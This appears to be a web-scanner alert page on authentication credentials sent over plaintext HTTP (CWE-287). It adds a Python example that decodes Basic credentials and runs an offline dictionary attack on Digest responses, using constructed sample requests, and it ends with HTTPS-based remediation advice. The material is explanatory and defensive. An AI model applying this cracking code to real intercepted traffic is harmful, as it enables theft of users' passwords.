Authentication Credentials Captured
- Risk:
Medium
- Type:
Passive
- CWE:
CWE-287
- Summary
An insecure authentication mechanism is in use: the request carries HTTP authentication credentials over a plaintext (non-HTTPS) connection. An attacker who can observe the traffic (on the same network segment, on any intermediate hop, or on a compromised proxy) gains access to the user ID and, depending on the mechanism, the password of the authenticated user. For Basic Authentication, the attacker merely has to watch the traffic until a request with an Authorization header is seen, then base64-decode the value to obtain the username and password; base64 is an encoding, not encryption. For Digest Authentication, the attacker immediately learns the username and realm, and can also recover the password if the response hash can be cracked offline (every other input to the MD5 computation, namely the nonce, request method, URI, qop, nc and cnonce, is sent in the clear, so each guessed password can be verified without further network access), or if a Man-In-The-Middle attack is mounted against the challenge.
The attacker only needs to eavesdrop on the network until an authentication has completed; no active interaction with the client or server is required.
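As an added example (not part of the ZAP alert text), the following Python shows what a passive observer of plaintext HTTP recovers from each mechanism: a Basic credential is decoded directly, and a Digest response is attacked offline by recomputing the RFC 2617 MD5 response for each candidate password, since every other input to the hash is carried in the captured header. The two captured requests, the victim's password and the wordlist are constructed for this example; the host and realm are taken from the example alert on this page.

```python
import base64
import hashlib
import re
from typing import Dict, Iterable, Optional, Tuple

# One key=value item inside a Digest header; the value is either quoted or bare.
_DIGEST_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def _md5(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.1 request into (method, request-target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def decode_basic(header: str) -> Tuple[str, str]:
    """Basic: the credential is base64('user:pass'); decoding needs no secret."""
    _scheme, _, blob = header.partition(" ")
    user, _, password = base64.b64decode(blob).decode("utf-8").partition(":")
    return user, password


def parse_digest(header: str) -> Dict[str, str]:
    """Digest: username, realm, nonce, uri, qop, nc, cnonce and response are all in the clear."""
    _scheme, _, params = header.partition(" ")
    return {key: quoted or bare for key, quoted, bare in _DIGEST_PARAM.findall(params)}


def digest_response(method: str, p: Dict[str, str], password: str) -> str:
    """RFC 2617 response value (MD5 algorithm, with qop=auth or without qop)."""
    ha1 = _md5(f'{p["username"]}:{p["realm"]}:{password}')
    ha2 = _md5(f'{method}:{p["uri"]}')
    if p.get("qop") == "auth":
        return _md5(f'{ha1}:{p["nonce"]}:{p["nc"]}:{p["cnonce"]}:{p["qop"]}:{ha2}')
    return _md5(f'{ha1}:{p["nonce"]}:{ha2}')


def crack_digest(method: str, p: Dict[str, str], wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: the password is the only unknown input to the hash."""
    for candidate in wordlist:
        if digest_response(method, p, candidate) == p["response"]:
            return candidate
    return None


def capture_credentials(raw_request: str, wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """What a passive observer of this plaintext request learns about the user."""
    method, _target, headers = parse_request(raw_request)
    auth = headers.get("authorization", "")
    scheme = auth.split(" ", 1)[0].lower()
    if scheme == "basic":
        user, password = decode_basic(auth)
        return {"mechanism": "Basic", "username": user, "realm": None, "password": password}
    if scheme == "digest":
        p = parse_digest(auth)
        return {"mechanism": "Digest", "username": p["username"], "realm": p.get("realm"),
                "password": crack_digest(method, p, wordlist)}
    return {"mechanism": None, "username": None, "realm": None, "password": None}


# --- constructed sample traffic (not real captures) ---------------------------
_PASSWORD = "s#cretPass"  # the victim's password, used only to build the samples
_REQ_HEAD = "POST /login HTTP/1.1\r\nHost: www.example.com\r\n"

BASIC_REQUEST = (_REQ_HEAD + "Authorization: Basic "
                 + base64.b64encode(f"admin:{_PASSWORD}".encode()).decode() + "\r\n\r\n")

_DIGEST_PARAMS = {
    "username": "admin", "realm": "members only", "uri": "/login",
    "nonce": "dcd98b7102dd2f0e8b11d0f600bfb0c093", "qop": "auth",
    "nc": "00000001", "cnonce": "0a4f113b",
}
_DIGEST_PARAMS["response"] = digest_response("POST", _DIGEST_PARAMS, _PASSWORD)
_BARE = {"qop", "nc"}  # these two are conventionally sent unquoted
DIGEST_REQUEST = (_REQ_HEAD + "Authorization: Digest "
                  + ", ".join(f"{k}={v}" if k in _BARE else f'{k}="{v}"'
                              for k, v in _DIGEST_PARAMS.items()) + "\r\n\r\n")

WORDLIST = ["password", "admin", "letmein", "Summer2024!", _PASSWORD]  # constructed

if __name__ == "__main__":
    print(capture_credentials(BASIC_REQUEST, WORDLIST))
    print(capture_credentials(DIGEST_REQUEST, WORDLIST))
```

Note that the Digest case needs no second packet and no interaction with the server: a capture of a single authenticated request is enough to run the guessing loop indefinitely, which is why a weak password behind Digest over plaintext HTTP should be treated as compromised. The same function returns only the username and realm when the password is not in the wordlist, which matches what the alert reports.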
- Solution
Use HTTPS for every request that carries credentials, and use an authentication mechanism that does not transmit the user ID or password in an unencrypted form. In particular, avoid the Basic Authentication mechanism, since base64 is a trivial, reversible encoding rather than any form of protection; Digest over plaintext HTTP still exposes the username and realm and leaves the password open to offline guessing. TLS removes the eavesdropping exposure for both, but a session-based login over HTTPS is preferable to either.
- Other info
- [POST] [http://www.example.com] uses insecure authentication mechanism [Digest], revealing username [admin] and additional information [username="admin", realm="members only"].